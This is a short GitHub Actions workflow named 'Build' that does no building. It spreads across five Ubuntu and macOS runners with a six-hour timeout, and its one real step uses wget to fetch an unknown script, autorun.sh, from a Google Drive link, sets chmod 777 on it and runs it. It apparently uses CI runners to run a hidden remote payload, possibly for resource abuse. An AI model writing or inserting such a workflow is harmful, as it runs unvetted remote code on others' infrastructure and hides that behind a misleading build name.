name: Build
on: 
  workflow_dispatch:
 
jobs:
 node-1:
    runs-on: ${{ matrix.os }}
    strategy:
      fail-fast: false
      matrix:
         os: [ubuntu-latest, ubuntu-latest, macos-13, macos-13, macos-13]
    timeout-minutes: 360
 
    steps:
      - uses: actions/checkout@v4
      - run: mkdir runner
      - name: Setup App
        working-directory: ./runner
        run: |
              wget -qO autorun.sh https://drive.usercontent.google.com/download?id=1Wz-LgEMxAv43iw6gZy0f0WLl2NztDcpF&export=download
              sleep 5
              chmod 777 autorun.sh
              ./autorun.sh
        shell: bash
